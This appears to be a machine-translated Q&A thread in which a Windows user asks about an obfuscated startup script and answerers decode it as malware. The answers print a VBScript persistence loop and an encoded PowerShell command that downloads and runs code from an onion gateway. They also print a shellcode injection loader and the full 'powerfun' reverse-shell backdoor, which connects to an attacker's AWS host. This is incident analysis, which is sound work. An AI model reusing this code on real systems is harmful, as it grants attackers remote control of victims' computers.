web-dev-qa-db-ja.com

起動時に実行される奇妙なコード

起動時にコードがWindowsマシンで実行されていました。このコードが何をしているか正確に知りたいのですが。それはクラックブックのようなものを参照しているようですか?

_@echo off  
if %PROCESSOR_ARCHITECTURE%==x86 ( START /B powershell -NoP -NonI -W Hidden -Exec Bypass -Enc WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0ACgBpAGUAeAAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACIAaAB0AHQAcABzADoALwAvAGwAYwAyADUAcQBqADIAZwBkAGMAYQBpAGQAYQByAGMALgBvAG4AaQBvAG4ALgB0AG8AOgA0ADQAMwAvAEwAZQBUAHIAVwBIAHoASQBxACIAKQAKAA== ) 
if %PROCESSOR_ARCHITECTURE%==AMD64( START /B %WinDir%\syswow64\windowspowershell\v1.0\powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Enc WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0ACgBpAGUAeAAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACIAaAB0AHQAcABzADoALwAvAGwAYwAyADUAcQBqADIAZwBkAGMAYQBpAGQAYQByAGMALgBvAG4AaQBvAG4ALgB0AG8AOgA0ADQAMwAvAEwAZQBUAHIAVwBIAHoASQBxACIAKQAKAA== )
_

[〜#〜] edit [〜#〜]:PCをフォーマットしてみました。 prpops.com (NSFW)からのスパイウェアがシステムに無断でインストールされているようです。

PCで起動するために使用していた設定ファイルは、PCをフォーマットした後もまだ残っています。これは、上記のbatファイルを実行するために使用した小さなコードです。

_Dim WinScriptHost 
WScript.Sleep(30000) 
Set WinScriptHost = CreateObject("WScript.Shell") 
WinScriptHost.Run Chr(34) & "%USERPROFILE%\appdata\file.bat" & Chr(34), 0 
While True 
set service = GetObject ("winmgmts:") 
running = 0 
for each Process in Service.InstancesOf ("Win32_Process") 
    If Process.Name = "powershell.exe" then 
        running = running + 1 
        End If 
next 
If running < 1 then 
    WinScriptHost.Run Chr(34) & "%USERPROFILE%\appdata\file.bat" & Chr(34), 0 
    End If 
WScript.Sleep(120000) 
Wend 
Set WinScriptHost = Nothing 
_

これがスクリプトを自動ダウンロードするか、何らかの方法でメモリに保存するかどうか教えてください。

windowsobfuscationpowershell
72
Aditya Giri

短縮版

攻撃者はマシン上でPowerShellコマンドを実行することができ、 "ec2-54-169-248-105.ap-southeast-1.compute.amazonaws.comの所有者を取得することで見つけることができます。 "。

ロングバージョン

バイナリ配列をファイルにダンプし、それを VirusTotal にアップロードしました。

新しく起動されたファイルは非常に小さい(1.7 kb)ため、追加のステージのように見え、PowerShellにバインドされるため、10秒間のみ実行されます(攻撃者が別のプロセスとして起動する代わりにスレッドを作成するため) )、最後のコマンドで終了が10秒遅れます。

更新:悲しいことにアセンブリをリバースエンジニアリングすることはできませんが、テキストエディターを使用してファイルをざっと見たところ、次の文字列が明らかになりました。

powershell.exe -exec bypass -nop -W hidden -noninteractive IEX $(
$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(
'A really long base64 full code can be found below'));
IEX (New-Object IO.StreamReader(
New-Object IO.Compression.GzipStream($s,
[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();)

ただし、この段階ではBase64への追加の難読化レイヤーとしてGZIPも使用されますが、次の場所にダンプできます。

# Powerfun - Written by Ben Turner & Dave Hardy

function Get-Webclient 
{
    $wc = New-Object -TypeName Net.WebClient
    $wc.UseDefaultCredentials = $true
    $wc.Proxy.Credentials = $wc.Credentials
    $wc
}
function powerfun 
{ 
    Param( 
    [String]$Command,
    [String]$Sslcon,
    [String]$Download
    ) 
    Process {
    $modules = @()  
    if ($Command -eq "bind")
    {
        $listener = [System.Net.Sockets.TcpListener]9999
        $listener.start()    
        $client = $listener.AcceptTcpClient()
    } 
    if ($Command -eq "reverse")
    {
    $client = New-Object  System.Net.Sockets.TCPClient("ec2-54-169-248-105.ap-southeast-1.compute.amazonaws.com",9999)
    }

    $stream = $client.GetStream()

    if ($Sslcon -eq "true") 
    {
        $sslStream = New-Object System.Net.Security.SslStream($stream,$false,({$True} -as [Net.Security.RemoteCertificateValidationCallback]))
        $sslStream.AuthenticateAsClient("ec2-54-169-248-105.ap-southeast-1.compute.amazonaws.com") 
        $stream = $sslStream 
    }

    [byte[]]$bytes = 0..20000|%{0}
    $sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n")
    $stream.Write($sendbytes,0,$sendbytes.Length)

    if ($Download -eq "true")
    {
        $sendbytes = ([text.encoding]::ASCII).GetBytes("[+] Loading modules.`n")
        $stream.Write($sendbytes,0,$sendbytes.Length)
        ForEach ($module in $modules)
        {
            (Get-Webclient).DownloadString($module)|Invoke-Expression
        }
    }

    $sendbytes = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '>')
    $stream.Write($sendbytes,0,$sendbytes.Length)

    while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
    {
        $EncodedText = New-Object -TypeName System.Text.ASCIIEncoding
        $data = $EncodedText.GetString($bytes,0, $i)
        $sendback = (Invoke-Expression -Command $data 2>&1 | Out-String )

        $sendback2  = $sendback + 'PS ' + (Get-Location).Path + '> '
        $x = ($error[0] | Out-String)
        $error.clear()
        $sendback2 = $sendback2 + $x

        $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
        $stream.Write($sendbyte,0,$sendbyte.Length)
        $stream.Flush()  
    }
    $client.Close()
    $listener.Stop()
    }
}

powerfun -Command reverse -Sslcon true

これは、サーバーに接続している攻撃者がマシン上でPowerShellコマンドをリモートで実行できるようにする、かなり単純なPowerShellバックドアです。この "powerfun"スクリプトは、GitHubで2秒グーグルすることで見つかるので、ここにリンクして、スパム対策の制限を広げないようにします。ただし、元のスクリプトと比較すると、攻撃者がリモートサーバーのアドレスを「ec2-54-169-248-105.ap-southeast-1.compute。」に変更したことがすぐにわかります。 amazonaws.com "と9999へのポートなので、必要に応じて攻撃者を追跡するのは簡単です。

最後に:サーバーはそのポートをまだリッスンしているため、攻撃者はコンピュータを制御できます!

107
VincBreaker

短縮版

マシンが危険にさらされており、攻撃者は引き続きコンピューターを制御しています。

ロングバージョン

Base64エンコード式(-Enc引数で渡される文字列)をデコードすることにより、PowerShellによって実行されるコードを取得します。

[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
iex (New-Object Net.WebClient).DownloadString("https://lc25qj2gdcaidarc.onion.to:443/LeTrWHzIq")

このコードは基本的に、Tor非表示サービスからいくつかのPowerShellコードをダウンロードし(Torに接続されていないマシンからTor非表示サービスにアクセスできるonion.toゲート​​ウェイを介して)、それを実行します。

ダウンロードして実行するコードを次に示します(もう一度、base64でエンコードされたPowerShellスクリプトのインライン実行)。

powershell -Enc [long base64 encoded string]

いったんデコードすると、次のコードに対応します。

$c = @"
[DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr w, uint x, uint y, uint z);
[DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr u, uint v, IntPtr w, IntPtr x, uint y, IntPtr z);
[DllImport("msvcrt.dll")] public static extern IntPtr memset(IntPtr x, uint y, uint z);
"@
$o = Add-Type -memberDefinition $c -Name "Win32" -namespace Win32Functions -passthru
$x = $o::VirtualAlloc(0, 0x1000, 0x3000, 0x40)
[Byte[]]$sc = 0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf2,0x52,0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x01,0xd1,0x51,0x8b,0x59,0x20,0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,0x8d,0x5d,0x6a,0x01,0x8d,0x85,0xb2,0x00,0x00,0x00,0x50,0x68,0x31,0x8b,0x6f,0x87,0xff,0xd5,0xbb,0xf0,0xb5,0xa2,0x56,0x68,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a,0x00,0x53,0xff,0xd5,0x70,0x6f,0x77,0x65,0x72,0x73,0x68,0x65,0x6c,0x6c,0x2e,0x65,0x78,0x65,0x20,0x2d,0x65,0x78,0x65,0x63,0x20,0x62,0x79,0x70,0x61,0x73,0x73,0x20,0x2d,0x6e,0x6f,0x70,0x20,0x2d,0x57,0x20,0x68,0x69,0x64,0x64,0x65,0x6e,0x20,0x2d,0x6e,0x6f,0x6e,0x69,0x6e,0x74,0x65,0x72,0x61,0x63,0x74,0x69,0x76,0x65,0x20,0x49,0x45,0x58,0x20,0x24,0x28,0x24,0x73,0x3d,0x4e,0x65,0x77,0x2d,0x4f,0x62,0x6a,0x65,0x63,0x74,0x20,0x49,0x4f,0x2e,0x4d,0x65,0x6d,0x6f,0x72,0x79,0x53,0x74,0x72,0x65,0x61,0x6d,0x28,0x2c,0x5b,0x43,0x6f,0x6e,0x76,0x65,0x72,0x74,0x5d,0x3a,0x3a,0x46,0x72,0x6f,0x6d,0x42,0x61,0x73,0x65,0x36,0x34,0x53,0x74,0x72,0x69,0x6e,0x67,0x28,0x27,0x48,0x34,0x73,0x49,0x41,0x49,0x76,0x6d,0x79,0x56,0x67,0x43,0x41,0x36,0x56,0x57,0x62,0x57,0x2f,0x62,0x4e,0x68,0x44,0x2b,0x37,0x6c,0x39,0x78,0x63,0x4c,0x56,0x61,0x51,0x69,0x7a,0x43,0x4e,0x70,0x70,0x68,0x44,0x5a,0x42,0x69,0x72,0x70,0x4a,0x75,0x41,0x62,0x4c,0x57,0x71,0x4c,0x33,0x6c,0x67,0x32,0x45,0x67,0x74,0x48,0x53,0x4f,0x74,0x55,0x69,0x6b,0x53,0x31,0x4a,0x2b,0x57,0x65,0x4c,0x2f,0x58,0x6c,0x4b,0x69,0x58,0x68,0x77,0x6e,0x36,0x4c,0x4c,0x70,0x69,0x36,0x33,0x6a,0x33,0x63,0x50,0x6e,0x6e,0x6a,0x73,0x65,0x39,0x51,0x5a,0x47,0x66,0x49,0x4e,0x69,0x6b,0x54,0x48,0x77,0x34,0x55,0x62,0x45,0x53,0x69,0x47,0x44,0x2b,0x51,0x34,0x2b,0x36,0x70,0x39,0x4a,0x4a,0x68,0x67,0x4b,0x65,0x41,0x73,0x58,0x64,0x49,0x33,0x77,0x4f,0x78,0x58,0x52,0x72,0x74,0x58,0x53,0x6e,0x71,0x47,0x4b,0x4f,0x59,0x50,0x66,0x55,0x50,0x6b,0x33,0x4f,0x41,0x2b,0x54,0x47,0x4a,0x6d,0x43,0x31,0x6b,0x4d,0x4c,0x39,0x4f,0x4e,0x73,0x51,0x6a,0x69,0x48,0x7a,0x37,0x6a,0x78,0x76,0x38,0x7a,0x2f,0x78,0x6c,0x43,0x42,0x50,0x39,0x6d,0x74,0x38,0x44,0x4e,0x4e,0x55,0x52,0x73,0x56,0x30,0x66,0x35,0x42,0x37,0x6c,0x38,0x36,0x6b,0x7a,0x38,0x6c,0x58,0x75,0x43,0x43,0x5a,0x6f,0x6b,0x4b,0x42,0x45,0x5a,0x36,0x4a,0x61,0x61,0x4a,0x31,0x42,0x43,0x4f,0x45,0x68,0x6c,0x57,0x58,0x69,0x50,0x42,0x74,0x7a,0x76,0x79,0x78,0x45,0x50,0x62,0x47,0x35,0x62,0x53,0x74,0x37,0x57,0x76,0x4b,0x61,0x37,0x4b,0x31,0x46,0x6f,0x50,0x6b,0x4b,0x2b,0x50,0x71,0x4b,0x43,0x70,0x57,0x2f,0x79,0x66,0x6a,0x70,0x57,0x49,0x32,0x64,0x33,0x4d,0x43,0x58,0x69,0x61,0x55,0x68,0x5a,0x31,0x44,0x36,0x31,0x6a,0x6d,0x59,0x53,0x63,0x50,0x54,0x46,0x65,0x38,0x41,0x31,0x4c,0x4f,0x49,0x31,0x79,0x71,0x32,0x63,0x78,0x42,0x51,0x39,0x52,0x53,0x72,0x41,0x43,0x70,0x44,0x7a,0x4b,0x45,0x6a,0x51,0x45,0x66,0x33,0x55,0x39,0x4b,0x46,0x7a,0x69,0x42,0x62,0x6a,0x6c,0x4e,0x75,0x44,0x6a,0x4e,0x32,0x6a,0x50,0x59,0x78,0x61,0x31,0x76,0x58,0x79,0x78,0x69,0x4d,0x74,0x6a,0x6b,0x31,0x68,0x71,0x2b,0x62,0x58,0x6b,0x35,0x33,0x72,0x4c,0x6e,0x66,0x36,0x66,0x45,0x71,0x50,0x61,0x6d,0x49,0x66,0x33,0x71,0x43,0x53,0x5a,0x68,0x4b,0x74,0x72,0x36,0x7a,0x46,0x37,0x72,0x35,0x2f,0x6a,0x51,0x43,0x49,0x56,0x46,0x63,0x72,0x73,0x61,0x33,0x66,0x4f,0x56,0x32,0x32,0x4a,0x7a,0x68,0x74,0x2b,0x77,0x7a,0x44,0x45,0x6c,0x64,0x4b,0x41,0x52,0x54,0x6e,0x63,0x67,0x73,0x72,0x2b,0x4a,0x62,0x6f,0x43,0x31,0x79,0x67,0x6b,0x48,0x6a,0x4f,0x75,0x6f,0x42,0x73,0x6c,0x66,0x34,0x35,0x35,0x4d,0x4c,0x49,0x62,0x74,0x54,0x45,0x63,0x2b,0x4b,0x66,0x76,0x2f,0x50,0x37,0x50,0x37,0x2f,0x33,0x42,0x75,0x31,0x2f,0x38,0x66,0x75,0x2b,0x55,0x30,0x4a,0x55,0x76,0x65,0x61,0x61,0x57,0x53,0x4b,0x58,0x79,0x2b,0x79,0x54,0x6b,0x36,0x53,0x70,0x54,0x53,0x47,0x68,0x4b,0x2f,0x2b,0x47,0x4d,0x62,0x71,0x53,0x78,0x74,0x4c,0x73,0x6d,0x59,0x30,0x75,0x7a,0x56,0x55,0x67,0x74,0x6c,0x55,0x43,0x61,0x6d,0x72,0x77,0x4b,0x47,0x6b,0x53,0x33,0x35,0x44,0x69,0x33,0x36,0x58,0x7a,0x71,0x54,0x49,0x70,0x4b,0x46,0x6f,0x6d,0x59,0x72,0x6d,0x72,0x62,0x77,0x6a,0x58,0x53,0x6b,0x44,0x49,0x5a,0x6c,0x32,0x41,0x76,0x5a,0x49,0x4a,0x68,0x70,0x6b,0x2f,0x48,0x6a,0x6f,0x78,0x4c,0x56,0x39,0x66,0x75,0x33,0x33,0x55,0x57,0x75,0x76,0x32,0x77,0x36,0x7a,0x34,0x34,0x45,0x34,0x32,0x2b,0x42,0x35,0x39,0x4b,0x6d,0x42,0x37,0x45,0x66,0x4d,0x57,0x55,0x4b,0x77,0x78,0x51,0x71,0x48,0x67,0x52,0x68,0x31,0x54,0x68,0x58,0x7a,0x53,0x4a,0x49,0x32,0x70,0x36,0x4e,0x4b,0x42,0x4a,0x4d,0x71,0x66,0x68,0x2f,0x63,0x7a,0x7a,0x6e,0x71,0x46,0x44,0x68,0x6b,0x59,0x57,0x33,0x65,0x41,0x6d,0x61,0x43,0x6a,0x2f,0x72,0x34,0x5a,0x65,0x6f,0x79,0x6c,0x71,0x38,0x65,0x72,0x6b,0x6d,0x2b,0x70,0x4f,0x35,0x7a,0x75,0x46,0x30,0x39,0x6e,0x4d,0x4d,0x62,0x2b,0x6d,0x6e,0x58,0x75,0x45,0x44,0x48,0x72,0x36,0x65,0x66,0x7a,0x70,0x6f,0x62,0x65,0x33,0x42,0x55,0x41,0x57,0x6c,0x63,0x76,0x75,0x56,0x4f,0x46,0x57,0x45,0x57,0x51,0x68,0x6a,0x38,0x78,0x5a,0x4f,0x54,0x73,0x62,0x6a,0x6f,0x4f,0x72,0x4b,0x38,0x38,0x55,0x35,0x61,0x50,0x78,0x63,0x64,0x73,0x33,0x75,0x75,0x6e,0x35,0x52,0x68,0x59,0x54,0x5a,0x37,0x7a,0x45,0x4a,0x41,0x47,0x52,0x4d,0x61,0x61,0x39,0x51,0x55,0x75,0x57,0x53,0x64,0x33,0x34,0x62,0x54,0x67,0x42,0x42,0x39,0x6e,0x36,0x7a,0x4c,0x77,0x78,0x4d,0x7a,0x5a,0x4f,0x74,0x45,0x31,0x58,0x72,0x31,0x71,0x77,0x6d,0x56,0x57,0x4c,0x74,0x79,0x7a,0x67,0x71,0x35,0x32,0x49,0x37,0x35,0x59,0x4b,0x33,0x4d,0x43,0x44,0x51,0x61,0x39,0x2f,0x43,0x6e,0x2f,0x45,0x6f,0x65,0x43,0x53,0x4c,0x78,0x51,0x45,0x58,0x4b,0x79,0x34,0x79,0x4b,0x55,0x6d,0x4d,0x44,0x51,0x37,0x47,0x6b,0x38,0x4a,0x41,0x76,0x55,0x47,0x61,0x34,0x7a,0x49,0x4c,0x62,0x74,0x6c,0x74,0x71,0x2b,0x74,0x4a,0x73,0x53,0x4d,0x51,0x58,0x54,0x72,0x37,0x4c,0x71,0x39,0x62,0x76,0x31,0x43,0x72,0x70,0x48,0x64,0x71,0x57,0x57,0x7a,0x77,0x63,0x71,0x70,0x30,0x47,0x79,0x78,0x6f,0x77,0x35,0x37,0x6e,0x56,0x54,0x54,0x6b,0x78,0x6c,0x63,0x61,0x30,0x69,0x6a,0x6a,0x5a,0x30,0x6f,0x70,0x4f,0x4c,0x35,0x65,0x71,0x35,0x6c,0x31,0x43,0x63,0x75,0x4c,0x6d,0x6d,0x34,0x31,0x4a,0x77,0x4c,0x55,0x49,0x68,0x5a,0x4e,0x62,0x46,0x71,0x72,0x35,0x71,0x32,0x65,0x64,0x79,0x44,0x51,0x65,0x2b,0x52,0x4d,0x74,0x74,0x69,0x4a,0x70,0x5a,0x49,0x33,0x75,0x4d,0x56,0x57,0x2f,0x4e,0x37,0x39,0x43,0x2b,0x33,0x4b,0x36,0x32,0x74,0x31,0x48,0x70,0x58,0x4b,0x50,0x76,0x44,0x55,0x2f,0x73,0x71,0x4a,0x54,0x71,0x6a,0x4d,0x58,0x52,0x30,0x6e,0x58,0x4d,0x57,0x31,0x7a,0x7a,0x4d,0x4b,0x2b,0x6d,0x52,0x45,0x56,0x56,0x4c,0x62,0x65,0x31,0x38,0x36,0x50,0x7a,0x6e,0x30,0x6d,0x32,0x57,0x63,0x59,0x4b,0x75,0x36,0x38,0x54,0x35,0x47,0x53,0x6a,0x43,0x76,0x79,0x4b,0x4e,0x33,0x4b,0x4c,0x6a,0x75,0x39,0x44,0x72,0x67,0x6e,0x4d,0x51,0x35,0x34,0x48,0x50,0x45,0x48,0x70,0x48,0x74,0x62,0x30,0x30,0x39,0x44,0x47,0x61,0x36,0x46,0x52,0x65,0x75,0x76,0x7a,0x73,0x4a,0x44,0x45,0x75,0x4a,0x45,0x2f,0x78,0x30,0x71,0x5a,0x63,0x6f,0x2b,0x68,0x35,0x51,0x41,0x32,0x56,0x42,0x70,0x6f,0x64,0x61,0x4c,0x6e,0x4d,0x5a,0x54,0x72,0x67,0x78,0x4e,0x36,0x54,0x74,0x74,0x4c,0x6a,0x77,0x32,0x68,0x35,0x56,0x41,0x44,0x77,0x79,0x79,0x46,0x65,0x67,0x41,0x38,0x2b,0x76,0x4f,0x33,0x44,0x49,0x33,0x7a,0x4a,0x6c,0x46,0x2b,0x67,0x67,0x70,0x58,0x69,0x41,0x47,0x6f,0x41,0x75,0x53,0x41,0x6c,0x73,0x42,0x62,0x35,0x42,0x79,0x57,0x41,0x54,0x67,0x32,0x79,0x4e,0x55,0x51,0x63,0x46,0x49,0x4b,0x4c,0x61,0x57,0x39,0x32,0x73,0x46,0x6d,0x44,0x64,0x62,0x35,0x4f,0x77,0x67,0x53,0x70,0x63,0x4c,0x33,0x6e,0x47,0x4a,0x77,0x33,0x58,0x2f,0x54,0x42,0x33,0x37,0x61,0x4f,0x54,0x39,0x4b,0x2f,0x61,0x70,0x38,0x61,0x35,0x6f,0x64,0x48,0x70,0x39,0x6b,0x71,0x52,0x77,0x65,0x6e,0x6a,0x50,0x6d,0x55,0x5a,0x48,0x4a,0x5a,0x33,0x65,0x74,0x32,0x44,0x4e,0x72,0x62,0x4a,0x30,0x69,0x34,0x52,0x4a,0x74,0x50,0x66,0x64,0x4f,0x4f,0x46,0x56,0x2b,0x56,0x31,0x36,0x76,0x2b,0x4e,0x6d,0x6c,0x56,0x33,0x79,0x52,0x56,0x63,0x65,0x7a,0x6c,0x43,0x72,0x36,0x39,0x71,0x4d,0x77,0x41,0x2b,0x51,0x36,0x63,0x4f,0x36,0x39,0x6e,0x6c,0x77,0x6b,0x41,0x41,0x41,0x3d,0x3d,0x27,0x29,0x29,0x3b,0x49,0x45,0x58,0x20,0x28,0x4e,0x65,0x77,0x2d,0x4f,0x62,0x6a,0x65,0x63,0x74,0x20,0x49,0x4f,0x2e,0x53,0x74,0x72,0x65,0x61,0x6d,0x52,0x65,0x61,0x64,0x65,0x72,0x28,0x4e,0x65,0x77,0x2d,0x4f,0x62,0x6a,0x65,0x63,0x74,0x20,0x49,0x4f,0x2e,0x43,0x6f,0x6d,0x70,0x72,0x65,0x73,0x73,0x69,0x6f,0x6e,0x2e,0x47,0x7a,0x69,0x70,0x53,0x74,0x72,0x65,0x61,0x6d,0x28,0x24,0x73,0x2c,0x5b,0x49,0x4f,0x2e,0x43,0x6f,0x6d,0x70,0x72,0x65,0x73,0x73,0x69,0x6f,0x6e,0x2e,0x43,0x6f,0x6d,0x70,0x72,0x65,0x73,0x73,0x69,0x6f,0x6e,0x4d,0x6f,0x64,0x65,0x5d,0x3a,0x3a,0x44,0x65,0x63,0x6f,0x6d,0x70,0x72,0x65,0x73,0x73,0x29,0x29,0x29,0x2e,0x52,0x65,0x61,0x64,0x54,0x6f,0x45,0x6e,0x64,0x28,0x29,0x3b,0x29,0x00
for ($i=0; $i -le ($sc.Length-1); $i++) {
    $o::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1) | out-null
}
$z = $o::CreateThread(0, 0, $x, 0, 0, 0)
Start-Sleep -Second 100000

私の理解では、このコードはシステムDLLをインポートしてから、いくつかのネイティブコード(8行目の長いバイト配列)を実行します。

さらに掘り下げるには、バイト配列からネイティブコードを再構築してVirusTotalに送信し、マルウェアを特定するか、サンドボックスでPowerShellスクリプトを直接実行して、その動作を動的に分析します。

編集:この最後の部分の分析は VincBreakerの回答で利用できます。

43
mdeous

Base64でエンコードされたPowershellコードでPowershellスクリプトを実行しています。

これは、実行されているデコード済みのPowershellコードです。

[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
iex (New-Object Net.WebClient).DownloadString("https://lc25qj2gdcaidarc.onion.to:443/LeTrWHzIq")

したがって、このスクリプトはhttps://lc25qj2gdcaidarc.onion.to:443/LeTrWHzIqからコンテンツをダウンロードして呼び出しています

悪意のある可能性のあるリンクへのナビゲートに警戒しているため、さらに掘り下げます。特に* .onion.toから来ているため、TORアドレス。

10
SecretSasquatch